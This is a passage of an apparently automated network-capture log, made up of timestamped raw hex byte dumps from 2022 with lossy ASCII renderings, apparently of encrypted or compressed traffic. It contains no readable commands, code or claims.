57 36 ae 8b 80 0b db e1 c5 2f 59 48 30 a7 f6 42 cd 27 13 de 84 60 9a 79 a8 ac ab 11 f2 92 11 e2 a7 d5 31 02 6e d6 a9 c9 4f 90 2a 09 ca a9 45 6a 41 66 63 2d ac 6f 22 6f 42 5f c7 60 26 ed 3d f1 18 41 0e cb 2c f8
                                                  Data Ascii: ?h=a<k"sApOwtsa7Z%!kE$R:'ap<S]05$U3NI%7=NA}NE\ufiSfRiIG?EMH@zDO|2)hf_^Z)7kR7KW6/YH0B'`y1nO*EjAfc-o"oB_`&=A,
                                                  2022-04-23 06:14:59 UTC931INData Raw: 16 83 e6 41 5a ab 89 a9 ee 7c 63 22 c5 bc 64 ce 27 e1 1c b6 c9 b1 e7 62 07 3c 6b 26 43 5a 0b 2e 82 12 cf 55 2c db b7 eb 9b 97 4b 45 34 97 71 10 55 c6 17 a8 0e 42 6c 4b b9 c5 b7 f0 7e 21 8b b8 00 b9 cd 8a 66 8c ad c6 da 1b c1 91 37 a5 e6 9e 2e 57 0e da f1 cd b6 dc fd ad bd eb 83 f5 24 e4 17 02 fe 6a 93 88 7e 57 8b 98 4e fb dc 71 02 27 c3 a5 2c 5e 21 59 44 c8 ea 55 f1 88 bc 20 b0 a4 2d e2 97 ea 4c 9d d4 19 bd 56 9a 9d aa 45 44 f6 e7 b8 3f 6a 33 8e 46 36 f0 f5 20 5d d2 fd 6d 7b ea 9a b9 41 0e 03 0a 4f 56 21 27 2e 92 9c 39 b7 ff 1a d6 87 15 25 10 aa e6 cf a9 63 b2 1a 0e 26 2e 75 2c ce 28 dc d5 82 f6 45 b9 6d 0e 54 09 08 89 7c ba 84 89 53 42 ff cc 41 85 ae e2 ba 6c 5b b9 a9 be aa fe 6f 87 fd 8c 86 dc 04 b7 c7 15 a9 0a f9 78 61 e6 93 0e e6 2e 6a cd ca f8 79 cd
                                                  Data Ascii: AZ|c"d'b<k&CZ.U,KE4qUBlK~!f7.W$j~WNq',^!YDU -LVED?j3F6 ]m{AOV!'.9%c&.u,(EmT|SBAl[oxa.jy
                                                  2022-04-23 06:14:59 UTC935INData Raw: 3a 90 b0 cf 07 32 b0 23 16 7e a6 3e 8a e0 05 e0 f3 25 8b f1 e8 1e db 30 f1 55 54 28 4d 17 78 b6 b6 9c b6 6c 42 29 34 ad 53 c8 6a d2 d3 38 8e 81 10 52 da f6 fd 5e b7 5f f7 6c 3d 30 3e 48 43 00 a7 64 b1 d0 51 51 65 ad 70 60 93 38 37 9a 59 8c 54 1e 2b 5b 90 6f b1 c8 ff 26 f1 bc 38 7c 6d 78 16 3b ee a7 3d 47 27 29 9a 8c a3 ba 71 5a f6 ea f1 40 a0 9e 61 d2 af 8f 1c ad fd 76 42 5c e7 04 bd 73 ed c2 f6 4b d7 02 73 51 e5 6b 76 88 67 aa 9e f7 74 67 0d 16 2f b3 03 e9 14 94 18 25 73 f9 b7 e5 38 05 bf 8c 43 3f ab 0d c5 2f ab e8 53 43 70 a9 1a d5 43 f2 7d 4f 36 d4 cc 5b ab 6e b5 90 a1 48 c5 b4 88 49 05 f4 66 70 f6 90 ae d2 3d fd 95 3e ff 8e cc 60 9d 41 8e 59 a9 88 66 c9 dd c8 31 12 af 4e 1c cc 69 1d 03 1a b4 c7 10 5a de e0 8a 05 80 ec 2b c8 23 e4 b5 e4 2b f1 7f 27 fa
                                                  Data Ascii: :2#~>%0UT(MxlB)4Sj8R^_l=0>HCdQQep`87YT+[o&8|mx;=G')qZ@avB\sKsQkvgtg/%s8C?/SCpC}O6[nHIfp=>`AYf1NiZ+#+'
                                                  2022-04-23 06:14:59 UTC939INData Raw: 0f 76 e8 d9 04 a0 69 9d 49 07 09 94 5c 34 0e c5 09 80 6f 3b ba f8 e4 5d 94 2b 98 20 15 6d 2a 0f 51 72 26 6c d2 d9 03 82 43 24 d9 eb 9d a0 7a 41 c6 3b c2 2f 4c 6b 39 38 6e fa ac 37 f5 38 3c 4a 75 05 f8 73 0d 42 db 12 c5 ba 79 56 54 93 26 9e d3 b5 7a e6 6c f9 df d6 d5 15 a5 fb 8f b7 f6 22 90 78 5b b7 64 95 d4 d3 e4 c5 6b f3 bf 65 a1 b6 98 90 94 d3 e4 0f 1b 80 f6 ca 5c 64 3a 57 03 02 5c d0 a4 45 e3 45 1d 83 a5 0c cc 82 2b 42 54 aa b3 82 7d e1 01 49 6a 2d d8 a9 2d bd 4b ac f9 3b dc 07 53 dd 02 9b 7e 07 af c7 b0 b5 d8 6a 79 33 b1 22 d4 fa dc 2f 81 f1 4c af c8 d5 53 54 db 36 eb 33 05 d4 40 db 55 e6 a0 91 0b 12 1e 41 96 b9 93 17 e7 e1 26 09 23 24 77 73 87 a9 e5 a0 31 e2 88 97 7c ba e6 28 8b ea 1d 4a ff 3c 07 15 fe 90 fb 3d 0c 68 5b c8 24 00 00 ff 8a fa 0a ca 3a
                                                  Data Ascii: viI\4o;]+ m*Qr&lC$zA;/Lk98n78<JusByVT&zl"x[dke\d:W\EE+BT}Ij--K;S~jy3"/LST63@UA&#$ws1|(J<=h[$:
                                                  2022-04-23 06:14:59 UTC943INData Raw: a0 31 0a 71 cb 7a 32 48 ea 17 ca 34 f5 e2 d8 c9 31 de 3c ad 16 3f 4c 33 58 b5 7d 59 03 3f d7 49 53 b0 b9 da 82 49 31 ea 79 98 dd 36 fc 5e 0b 21 0a 65 19 76 87 4a 1d 5c 62 4f 15 6a b4 59 bb aa 77 a5 0a a1 9d fa 55 5c 50 fa 10 e7 f3 88 8c a3 62 03 83 47 6b 14 46 ad 3e 71 35 ee d2 c2 c7 3b 23 36 91 9d 06 33 e1 52 d1 b3 25 0e 15 2b dc 80 6f 58 de 4c 8d f7 52 3d 0c 67 99 de 49 8d 39 45 2f 38 18 3f 0c 34 bf 0d ad 45 b5 d7 41 00 e8 93 bd d6 a1 74 f1 26 78 e9 8f 56 2b 03 28 51 05 c9 7f 05 70 98 33 38 1c 41 e1 a1 7f 37 95 8a b0 13 f8 14 00 d5 07 4c 45 91 27 f0 fd e8 51 51 81 62 4b 94 dd c0 81 3d 16 11 50 41 a0 00 b9 71 db d0 55 0b a2 30 d1 30 31 a3 7b 04 f1 ab 42 92 75 87 88 c5 e2 8e 71 27 01 f1 a1 19 52 70 8b 88 fb a6 45 1c f5 ea 9b 83 22 48 f5 19 8a 45 ee fe fa
                                                  Data Ascii: 1qz2H41<?L3X}Y?ISI1y6^!evJ\bOjYwU\PbGkF>q5;#63R%+oXLR=gI9E/8?4EAt&xV+(Qp38A7LE'QQbK=PAqU001{Buq'RpE"HE
                                                  2022-04-23 06:14:59 UTC947INData Raw: 10 54 83 8e 1a 27 a2 a7 5a ae dc 94 b9 da f9 81 d2 6e 0c a5 ea e9 5d a6 34 21 26 01 36 d0 7b 28 fa 67 ae ca 47 8f f4 13 49 01 cf df b9 11 f8 91 0f fb 0b c2 59 5d 40 65 27 2e 52 bd 24 0b 3f b8 c0 2f 57 04 9d ba 1b 54 8a 52 fb 1e c1 fd 1d c0 eb d5 7d 81 77 7f fe 30 7f d8 be 06 89 43 66 33 44 4e ba 1c 51 cc 23 19 04 db be d2 77 41 6f a3 75 bd 92 71 a0 54 97 de 8c 38 f6 44 4d a7 09 10 53 71 63 6e ab 4a 46 b8 5c 79 cf 84 9c 3c 74 5a ca 9b ad 2d 92 b9 05 37 b3 29 88 29 72 41 c4 c4 bf 9a 3f a6 2c 61 5a 51 91 4a 2e b3 73 5f 0b 10 60 68 25 3d 89 27 3e 90 23 0b 20 cd 68 96 d8 a6 b7 15 92 c5 bc 9d 54 ad ea 8d ba 27 85 06 57 88 e3 00 23 e3 f8 c7 a5 16 79 b0 dc 87 be 0c a0 d2 9f 9b bb c4 d0 33 7b 60 e9 13 21 47 02 b8 52 36 5a 56 0f ad 06 d2 5c 21 15 98 dc 14 c5 c2 8e
                                                  Data Ascii: T'Zn]4!&6{(gGIY]@e'.R$?/WTR}w0Cf3DNQ#wAouqT8DMSqcnJF\y<tZ-7))rA?,aZQJ.s_`h%='># hT'W#y3{`!GR6ZV\!
                                                  2022-04-23 06:14:59 UTC951INData Raw: 5e 8f 2c c8 5b 67 65 b8 f9 87 89 d4 a1 fb 9d 32 35 c4 d3 e6 fc bd 32 a4 a4 4d e9 7a 29 21 45 0d ac 3c d5 2a 08 eb 6c 08 9b b8 bc a3 b8 6c d3 7a 0c 2a 91 ad 6c 15 ec 24 8c 89 f6 75 6b a3 26 19 64 b1 45 8f d8 a7 60 d5 b7 d5 b0 ec 86 81 1e 51 f8 aa 82 78 2b 4d bf 9c ec 97 be 97 9b 80 59 fd 9d 10 bf 4e f0 52 3c 0c 86 0a fd 41 5d 1b 3e 4f 53 46 ad 3e 4c 7e 23 86 f1 4b 6e 91 d5 7c c9 29 7a 07 1b 30 68 2c 1b b0 06 2d 05 ed cc d6 8f b1 be 9e f8 39 ab 68 fb 2f 53 b8 7d 20 ec b3 93 d1 34 f9 5e a6 0e 8e 7a f1 75 f9 69 fe 73 41 fa da 10 59 06 62 ea b8 1f cf 52 93 36 45 96 79 35 14 ad b5 3c 14 20 a6 a4 2d 1f 60 fa 33 46 65 36 30 2d 8d 1b 09 38 0b d0 e4 4f ef cd eb 6f 29 38 0b 35 d3 6e 02 f8 8e a3 97 96 00 3e 80 74 2d 5c 5d 69 09 97 51 76 c9 92 bb f4 11 e8 9d 62 15 fa
                                                  Data Ascii: ^,[ge252Mz)!E<*llz*l$uk&dE`Qx+MYNR<A]>OSF>L~#Kn|)z0h,-9h/S} 4^zuisAYbR6Ey5< -`3Fe60-8Oo)85n>t-\]iQvb
                                                  2022-04-23 06:14:59 UTC955INData Raw: 7f 5f a6 44 58 70 54 2f be 26 e0 3c bf 18 2b 4e 6e cb d5 cc 82 a1 38 76 cf 69 ff b4 64 53 34 7d a6 06 ad 81 ef 2c 26 17 f8 3c d3 f3 88 6e 06 44 96 38 ab d1 1f 68 94 a8 f8 ae 79 18 68 30 fc 18 cb 47 2f 87 ef 4d 1d 29 40 85 08 7a 99 11 6b e9 2f 76 25 5e e6 fd 1a 4c 64 8b ac 89 e9 64 39 7e 37 23 07 ec 71 c8 5c 17 c5 ba 5e e5 8b f6 2f 8d 89 8c 42 f6 77 a8 5d ab 56 29 ca b0 cb 66 46 ff b1 36 e9 0b d6 78 c9 77 ea ce b2 bc 9d 69 a1 54 f0 f4 da da a9 cb 63 66 e3 7e 15 7a d0 62 de fa b8 8b dc 39 1b 7c fb cf 5c c7 7e 07 68 14 13 b7 e5 99 62 76 53 0e 1a 89 37 cf 9f 13 45 4d a6 39 00 34 d4 5c 93 2c aa 93 00 8e 43 ec ea be e0 79 18 7b 21 02 f1 48 71 b3 b3 b4 77 02 72 82 f1 6e b3 5b 4c 0a 5f 46 e6 92 9a 27 dc a3 fa 1a 82 fd 5e 21 a7 b5 61 a9 46 56 51 6c 2b ee 6c 26 e7
                                                  Data Ascii: _DXpT/&<+Nn8vidS4},&<nD8hyh0G/M)@zk/v%^Ldd9~7#q\^/Bw]V)fF6xwiTcf~zb9|\~hbvS7EM94\,Cy{!Hqwrn[L_F'^!aFVQl+l&
                                                  2022-04-23 06:14:59 UTC959INData Raw: ee 73 ca f8 8f 38 6c af b2 ee a1 28 86 b9 d4 9b 90 88 93 94 a0 30 c8 03 60 b3 10 1b 46 99 5a 84 61 16 0b ec f3 e7 a5 3b 10 26 7b 24 b7 03 30 27 6c 57 4b f5 b8 a0 70 e9 98 f8 72 16 f8 0e a0 1f 9a bc 2d f7 2d c6 d4 fa b2 79 0f e8 ca 98 e1 f2 1e 7b b9 72 ab 9f 35 9f 11 bf 01 e0 1d 58 5a 9d b0 2a 38 c0 b3 92 b7 d7 5d eb 33 c1 7e 51 3d 0b 76 8f 73 99 59 cc 1c 59 d5 7d 85 a4 59 b6 7b 35 ac 87 b4 63 5b a4 59 b8 8d 4d 74 25 7c a2 31 89 08 5c d9 b2 b4 23 7f 7e 4a f0 e4 86 aa a4 f7 fc 92 99 1f ad e6 5e 04 37 c8 84 14 f0 3c 96 25 e9 e1 b9 4c c6 8b c8 32 09 4d 58 d4 4d 2c 55 6e 1b 00 4f 79 3c c3 d8 4a bc a3 9f a2 6f e3 ae 82 f7 50 03 5b 89 e8 04 7e b7 ef cb 00 7c b1 fd ec 02 78 ed fb dc 8b 40 5d 81 a5 ca 70 4e 98 4f 62 69 70 33 5f 6c ae 33 6c 0e 61 4e ea 00 42 57 a8
                                                  Data Ascii: s8l(0`FZa;&{$0'lWKpr--y{r5XZ*8]3~Q=vsYY}Y{5c[YMt%|1\#~J^7<%L2MXM,UnOy<JoP[~|x@]pNObip3_l3laNBW
                                                  2022-04-23 06:14:59 UTC964INData Raw: c4 8f 28 ed 29 85 76 aa 70 86 d0 e0 85 b3 55 84 41 05 48 6c ed 43 c0 16 23 69 1a 15 7d 23 21 0c e3 88 88 2e a6 6d 5f 35 2b 41 f9 5a fe e7 1f 9f aa d3 24 a6 8b 91 e4 de 89 64 75 4a 46 09 c1 3f db 6f 59 ee ff 5d f8 31 a7 30 82 20 8c 58 b4 7d 81 72 2c b5 39 04 59 6b b4 39 8c cf 5b 28 32 d5 bf 8a e2 23 8d dd 23 6f 08 a8 d7 9a 4d 13 24 9f d0 ed 7e 6f 2f cb 98 14 39 e1 27 4e b8 78 bd c3 af c1 0a 3f 38 7b a2 0b c2 6a e4 ed 4d 6c 08 9a d5 c8 47 97 3c 11 40 df 7b c4 b7 0f 4b 6f 84 67 6a 09 19 8e df 43 c0 f8 d1 07 c8 d7 4f 54 56 47 c0 87 a1 f3 e5 32 6a 18 ea 6d 88 17 f6 18 3c e3 d5 13 5a 88 0c 05 5d 5c 02 28 cb cb 45 14 b9 11 45 8d a5 5c 27 04 ac ec 09 85 93 ee 05 06 5c 7f ea 85 92 6c 69 41 f0 6c eb 25 0a 52 57 a2 b5 72 ec 91 20 d7 a4 f1 fe 6c 1d 2c 6e 3d fb 46 b8
                                                  Data Ascii: ()vpUAHlC#i}#!.m_5+AZ$duJF?oY]10 X}r,9Yk9[(2##oM$~o/9'Nx?8{jMlG<@{KogjCOTVG2jm<Z]\(EE\'\liAl%RWr l,n=F
                                                  2022-04-23 06:14:59 UTC967INData Raw: cd c8 27 ce 5e 5d ae 61 5a f6 ca 29 0e 9e d1 08 7e 0b af 1d e6 b6 50 9d 94 c6 fa d3 e9 14 88 ba f8 d7 12 6d 82 2c c2 99 19 11 cc 2c a7 5c bd a6 9f 4e c7 f3 8b bc 3b ee 99 77 d4 96 e4 ae 98 fe a0 d7 d2 29 04 b7 c0 ab a0 32 1e ec 0d 58 98 e2 c2 24 2c ba 0b 28 37 b7 1d d2 aa 84 bb fb f8 81 fe d3 ec f1 e8 52 62 b3 b7 86 98 50 d2 6c c1 bc aa f2 2f 15 14 82 9e 5a fb 71 55 ca 16 2a af ac c2 f3 00 4c 0c cc 87 53 03 89 da c5 8f 23 a0 f8 0e 15 e2 29 5b 36 81 f7 8e 75 43 bb 56 c5 6f f8 f6 26 4b 59 45 8b 85 9d 09 cb 73 38 33 73 b9 01 8e 87 7b aa f7 e7 1d b1 04 24 69 14 0b fa bb c6 8c 54 96 d4 12 a2 dd 1a 81 b5 1b b6 01 d3 dc d7 71 74 cb f4 84 9c 58 81 05 ac c0 48 d0 4f fb 3c 40 fd d0 d4 77 93 6d d5 cf 2e 92 c7 73 d7 7b 6e c7 e4 df bd 89 e3 c0 df 2d e2 68 27 42 a1 f9
                                                  Data Ascii: '^]aZ)~Pm,,\N;w)2X$,(7RbPl/ZqU*LS#)[6uCVo&KYEs83s{$iTqtXHO<@wm.s{n-h'B
                                                  2022-04-23 06:14:59 UTC971INData Raw: 30 2d 41 35 e6 fb 9e 4b 45 d8 c9 db 97 f4 28 f4 f6 23 71 7f ad 13 a5 df b3 50 ef d2 87 af bf 07 79 0f 9f a2 77 ae 0a 7c 4c 01 9f 39 f6 26 0d 8d ac ec 03 5f 59 20 1b bd 91 9b b6 b4 17 88 4f 91 76 59 c5 b4 ff e2 d3 47 b3 99 e0 93 a1 d3 83 8c 93 ab 0d 42 fb 70 ba c5 05 99 a4 fb a9 c8 88 3a 55 c2 34 12 dc 72 59 a0 26 14 12 98 43 45 52 4c 37 b6 af 98 18 c5 fe af fe 00 d7 01 64 a0 4a 48 00 b8 ad c4 de 4e 20 c7 f6 ea 2e 79 17 fb 53 4e e6 90 c1 e7 e0 54 72 9a d5 5f 40 58 83 9f 00 83 4f 43 60 67 a5 3d 8c 3c 52 36 e3 0c 7c 43 29 0a 25 bb d9 d3 a7 28 73 ce da ca 35 c6 71 de 1e 29 7a 8a 7d 1d 60 59 11 04 18 ab 6b 53 34 c7 1f e1 68 a1 bb 76 66 b3 a1 f1 fe a1 51 b1 a0 c2 15 0a 15 0f 07 78 04 e7 e4 24 cd e2 ce 5c 3e e5 a8 28 3e c4 cb 10 ac af 0a ad 92 1a 72 fc 35 ad eb
                                                  Data Ascii: 0-A5KE(#qPyw|L9&_Y OvYGBp:U4rY&CERL7dJHN .ySNTr_@XOC`g=<R6|C)%(s5q)z}`YkS4hvfQx$\>(>r5
                                                  2022-04-23 06:14:59 UTC987INData Raw: ba 24 de e8 07 18 c5 14 f9 d6 20 f4 89 3d 4b 6a cd c3 2d 2b ec 65 9f 67 26 18 57 a6 2d 76 1a a4 ef 39 f1 0f ae ff e1 7e 7d 7e a1 dd fe 7e a2 bd 46 3a d6 46 7e c4 e2 9f 24 c2 a8 53 cb 32 82 8a ad b3 f4 4a 2c 02 40 6a 73 79 aa 5a c8 f5 ed ed 1e be ba c2 f8 01 29 da 9d de 02 ee 49 ab ee 1b e0 3a c1 e1 3e 6f 48 d5 56 70 75 37 d1 6d d0 8d 03 74 e4 20 ce f6 d6 0e e6 1e 95 c5 82 06 1d 57 d8 24 aa a5 c4 8a c2 06 ea b1 2b 7b 70 ce 43 64 81 b5 1e e5 26 39 6f 77 69 20 6c b7 0c 18 49 b8 2c b6 76 0c 22 12 e3 64 b5 1e 20 cc 77 0f 71 a5 d1 f3 b0 48 f2 b1 9a 91 b4 33 78 b2 15 10 ed aa 02 19 51 0e 99 ae a3 0a 98 2e 18 1b af 44 29 e9 de 53 d2 72 8f 66 b4 a5 3c 1d d5 2c 72 fe 9e 46 e7 98 d4 ee 14 e4 f1 ff 87 12 e9 a0 97 a7 78 d9 e9 47 d7 1b 81 e1 2f d6 c5 40 04 0a 91 68 41
                                                  Data Ascii: $ =Kj-+eg&W-v9~}~~F:F~$S2J,@jsyZ)I:>oHVpu7mt W$+{pCd&9owi lI,v"d wqH3xQ.D)Srf<,rFxG/@hA
                                                  2022-04-23 06:14:59 UTC999INData Raw: 81 10 a2 99 e1 65 e8 48 18 f8 74 14 26 ee 2e d1 52 fb c8 56 1a 65 6c fe 3e f6 b7 0f 46 05 4b ea 2c fe c5 49 9f 9c f7 dc 46 69 24 b1 ac d1 c9 5a 8c 9a b2 77 a1 bf 22 25 6e 5c 52 a1 f1 03 c6 5c 82 f5 00 64 04 52 b8 25 2d e9 2c 4e 02 bf 7d 65 71 49 57 6c 16 3d e3 21 41 93 66 b3 1e c9 a9 26 a6 98 c3 4f 94 7c b4 f2 de 1c 8e 88 0e 33 d8 de 30 e1 4d 30 1d 98 26 05 26 bd f7 65 eb f2 3b 8f 88 1d 1f f8 13 26 bf 23 17 84 9a b2 2f 2d 38 4b a8 06 eb 1c 6b a9 e5 97 4a e3 48 64 d3 09 ce fd b2 59 7d 96 8d 17 83 3c 65 ba a7 03 92 97 ec 4b 27 b6 7c 93 0a f5 8b 7a 0c ae a9 8f 2f 12 0f 41 bf 60 33 7f e6 a2 b9 c2 f4 1e 7e 29 59 57 77 7d 19 c7 69 30 64 cf d1 1a 1b 29 31 da d4 76 d5 90 87 e0 41 89 51 8a 7a d6 57 72 88 44 6c 5e 62 48 c9 93 c6 42 f9 81 10 30 f2 f0 2e 32 76 f1 5f
                                                  Data Ascii: eHt&.RVel>FK,IFi$Zw"%n\R\dR%-,N}eqIWl=!Af&O|30M0&&e;&#/-8KkJHdY}<eK'|z/A`3~)YWw}i0d)1vAQzWrDl^bHB0.2v_
                                                  2022-04-23 06:14:59 UTC1015INData Raw: 7a 4e 04 0e 9a d8 f7 e2 8c 1d cd b9 28 c5 98 cc b5 d4 bd 12 f3 bd 15 08 07 fe 13 e6 b9 5c 4d 13 92 cf d7 c9 1f f2 a1 b8 b7 f2 64 f0 bf 64 86 e9 9d b3 31 e7 36 e3 ba 6b e0 61 14 5e 4c f3 30 fb d6 37 28 77 25 ac 9b 3e 8e 27 06 9e 18 ac 07 b9 c2 fc 90 26 90 c6 93 15 f3 68 0f f8 e5 14 de 11 87 51 f7 a0 d9 5c 8a a0 c3 c5 11 dd 80 22 92 4a b4 6d 15 d9 52 d7 1b 62 88 02 0d 98 83 8a b3 d2 15 42 41 d1 51 17 73 db 6d 25 cc 26 b2 91 69 90 ad d7 ad a6 5e 8a a0 af 38 4b b3 d9 6e 56 14 a6 42 3b f4 e9 77 2e 8b 47 92 f2 d4 6f 76 80 80 07 c7 04 52 e4 4f 29 83 8e 41 e0 69 b3 69 65 26 94 7c 16 32 de 01 b9 f4 f0 8a 62 1c 87 9c 23 da 49 42 47 9f bf 9a 32 54 b7 39 43 77 bf 82 39 bf bf 38 dd 1b 34 51 31 4e 66 68 48 58 2b 76 c0 c1 7a e8 ec 19 95 87 8e 22 76 f4 c8 b7 1b 7d 6a 83
                                                  Data Ascii: zN(\Mdd16ka^L07(w%>'&hQ\"JmRbBAQsm%&i^8KnVB;w.GovRO)Aiie&|2b#IBG2T9Cw984Q1NfhHX+vz"v}j
                                                  2022-04-23 06:14:59 UTC1031INData Raw: 36 dc 36 01 98 00 c7 0d da f5 fa 78 8b d9 74 34 f3 c8 da 96 33 49 70 8e a8 ef f9 b0 50 5f 9e cc 72 47 44 28 24 e3 a7 2c 7f 8b e8 26 4c 6c 8e 49 b8 3b 3b 0f 46 9d de d8 a2 a4 43 29 c2 7d 30 66 1b a8 7c e9 e6 23 39 6a 31 4f c5 cf 15 a2 fb 62 ef 2b 65 c4 1f c4 26 45 f7 cb f8 be 1c c5 ca 81 78 83 d4 da f1 7c 68 17 03 bd ce f0 84 25 1c c5 18 1b a4 48 53 49 cb 9b ef 96 26 fa d9 97 d6 ae 3d fe 16 4d 9c d6 36 0c 03 5e 19 8a cd 8c d2 07 67 11 7e b2 c0 8e 14 c1 20 f1 eb 14 99 fb 0f 6c e9 b3 e0 4a c0 1f 64 14 17 5c 48 79 68 d9 9a 3c 24 60 75 37 2b 3c e6 0b 2f 9c 18 ff a7 9e eb b9 54 6d f4 14 19 46 42 c9 22 16 08 2d c6 11 16 5f 9f 96 ce 58 1a 31 91 2a ea 83 2d 1f 83 ae 63 24 db 7a cc 62 60 9c e9 df ff d2 e4 ff 02 49 9a 4c b9 12 95 93 0b 4f 32 13 ed d0 4d ea d4 82 b3
                                                  Data Ascii: 66xt43IpP_rGD($,&LlI;;FC)}0f|#9j1Ob+e&Ex|h%HSI&=M6^g~ lJd\Hyh<$`u7+</TmFB"-_X1*-c$zb`ILO2M
                                                  2022-04-23 06:14:59 UTC1047INData Raw: 02 38 8b 19 ed 0b 84 26 a2 4a 4c d3 f8 23 23 5b de c3 2e 45 22 99 fa f4 1f b3 de 1b 1e cb cf a6 a6 e7 0c d3 a2 2c f2 9e 32 a0 7b 51 c1 ec f9 ab fd ac b8 77 bf dc 08 78 e6 f1 6a 3e a9 6c 9f 1a e6 db 68 6e cb 9a de e6 03 1d 5a b2 4a 0e 98 bf 18 76 dc 2f 3a 88 66 ee 2e 18 38 94 87 da c4 ae 68 36 b6 80 a9 c7 09 d3 3a 23 cd 60 01 11 13 ad 13 c3 de 42 0d 85 f5 80 62 b5 a0 14 b7 67 9d 9f b3 19 40 e1 dc 6b 44 99 5f 8c f1 15 ed 23 ba 35 40 b9 3f 14 95 45 35 de ec fe 58 8e 39 28 9e 19 a9 b4 6a 98 44 7e 5b 55 2d 8d 3c 02 ff 41 4f 12 b0 9b 23 84 0f 72 80 8c 26 f3 a8 cb 4f 4f 33 aa f1 eb 40 ce 26 78 83 3a 03 8f 2e 77 7c dd 43 13 50 f3 2b 5d 4b 5a 80 58 b7 9b 41 98 e4 48 a5 67 01 55 84 22 84 ad 9a 75 77 de e3 4f fe 23 49 18 b4 56 ef 9e aa 0b ef f3 69 cc da ba be 5f 57
                                                  Data Ascii: 8&JL##[.E",2{Qwxj>lhnZJv/:f.8h6:#`Bbg@kD_#5@?E5X9(jD~[U-<AO#r&OO3@&x:.w|CP+]KZXAHgU"uwO#IVi_W
                                                  2022-04-23 06:14:59 UTC1063INData Raw: fc b0 17 10 bb ff 5b 49 68 be 98 bd d5 bc 84 8b 15 62 ae 1f 8d db 92 2b c0 92 6a e0 75 45 6c 4a 08 d8 50 b0 af 26 fe 7b 6d c6 8f d0 6c 42 e3 6f af 13 1a 0d c8 8a 84 f6 bd c5 56 a3 9a 2d a3 a9 23 16 9f 13 44 8e 3e 60 62 a2 ea b6 3e 57 f6 77 53 7e 42 f1 1d 52 29 ad 45 27 83 61 d1 27 f6 c2 51 c5 36 83 a0 46 91 35 ac cb 80 c1 0c 94 1e 24 72 b1 57 57 f1 25 04 5f 7d f0 bd 0d 0d fa 48 d9 82 b8 97 44 b5 12 d7 94 4e 33 ba 73 25 50 56 93 cf b2 a1 f4 10 17 e3 ab 45 89 65 b4 c1 e7 ba 01 c5 de d0 cb 7f de 91 78 3a 5c 2f 6a 63 0a f5 9d 82 aa bd f0 10 91 6b 6d 79 12 d9 ef f0 46 b0 e1 81 ec 9f 43 14 59 31 5d cf ea 48 d7 c4 e6 b9 82 34 98 8e f2 30 b2 87 d8 6f 4e a0 80 cc 69 d5 a9 3a 59 56 fe 46 39 04 38 82 70 54 90 29 35 f8 37 ab 7e d7 86 f8 d3 fd b4 de 5f 72 81 7b 96 eb
                                                  Data Ascii: [Ihb+juElJP&{mlBoV-#D>`b>WwS~BR)E'a'Q6F5$rWW%_}HDN3s%PVEex:\/jckmyFCY1]H40oNi:YVF98pT)57~_r{
                                                  2022-04-23 06:14:59 UTC1079INData Raw: 2d c3 23 77 7d 62 47 74 8b 5a 47 f2 38 9a 58 f7 7d f6 db ed 34 e2 50 ba 96 3a 6d 14 3c 0f 3e 3b a0 c7 8f f7 02 56 e9 a0 61 7c 81 3e 0d 7d a9 61 44 de 0b 44 b1 ef 72 06 aa af c7 e2 d3 2d 3c 6b a1 94 1d 2e b5 66 34 c5 e6 1d 76 90 0b 08 d2 dc c0 a1 b2 77 e4 91 93 ec e7 67 54 48 1f 9b 95 37 cd ec cb 06 b0 0c c0 91 5e c2 aa 96 d9 5f c2 9a ba 50 d2 46 e6 a3 8d d2 49 79 81 cc 5f 27 c8 8d f7 86 51 d0 45 c0 d8 01 ab b2 35 a4 12 fd d0 47 1e 4e b2 9a a3 ef f8 df 91 4f 5a 9f bb 53 f7 cc d6 3e 75 e5 76 6c 4f 2b 3e dc 18 fb bc 85 17 a8 9f c1 ee 81 ae e4 86 5e 7c 5e 18 98 86 df 51 cd 25 af 0b 94 9f e3 b4 7b 71 4a 11 46 f8 e4 1b 00 1d 1d d3 19 b2 f4 3e 1e 34 7e 98 58 4f 29 4f c2 f0 28 e6 3d a0 06 51 05 4f 16 4e 87 13 91 8a dc 12 b6 7b e8 9a a7 77 0e cf af 32 c5 9a 0a 01
                                                  Data Ascii: -#w}bGtZG8X}4P:m<>;Va|>}aDDr-<k.f4vwgTH7^_PFIy_'QE5GNOZS>uvlO+>^|^Q%{qJF>4~XO)O(=QON{w2
                                                  2022-04-23 06:14:59 UTC1095INData Raw: 6e 68 cb 40 74 1f 50 6f 28 a5 03 53 54 7d 0f e4 da db 73 09 31 9d 85 39 16 87 f7 f1 5b 4f f1 56 6c ba 2c 52 9f b8 2f bf bd a1 0b e9 3c ce 8e f5 f5 b1 12 2a 74 27 03 04 9c 6d 84 89 64 29 37 8d a8 ec 32 27 bd 10 3b 27 f5 5b 62 03 55 89 d7 4d 73 dd de 55 29 76 3e 8d 23 96 f1 27 7e 75 d3 f9 67 fa f3 49 f3 6b 94 d0 ff 2c 33 e9 fd d1 8d ca 0d 7b 2c 40 d6 dd 43 03 6c 1b 2c 04 bc 87 ba e9 57 4a 13 7a 39 f8 a1 47 f8 a7 0f 53 06 6c 2b 5e 43 9c 60 57 a6 2a a1 8f ab 54 15 6c b4 37 f7 b2 28 85 7b 10 7e 06 15 d8 d3 5a 30 64 4a fe 55 37 93 46 9b 71 0d f3 ac 7a 79 f2 4e 4d 1a 39 1c 18 af e5 be 8e 67 c1 dd f3 75 63 99 1b 0b dd 57 92 ef 94 9a b6 47 90 51 a4 8b 87 16 fc fb 6f f3 c5 a0 9a 3c 40 f7 ca 06 3c 9a 48 0a 1c 36 c6 76 7c 9a 83 7c 40 8b 36 f6 66 1e f2 19 48 31 8e 40
                                                  Data Ascii: nh@tPo(ST}s19[OVl,R/<*t'md)72';'[bUMsU)v>#'~ugIk,3{,@Cl,WJz9GSl+^C`W*Tl7({~Z0dJU7FqzyNM9gucWGQo<@<H6v||@6fH1@
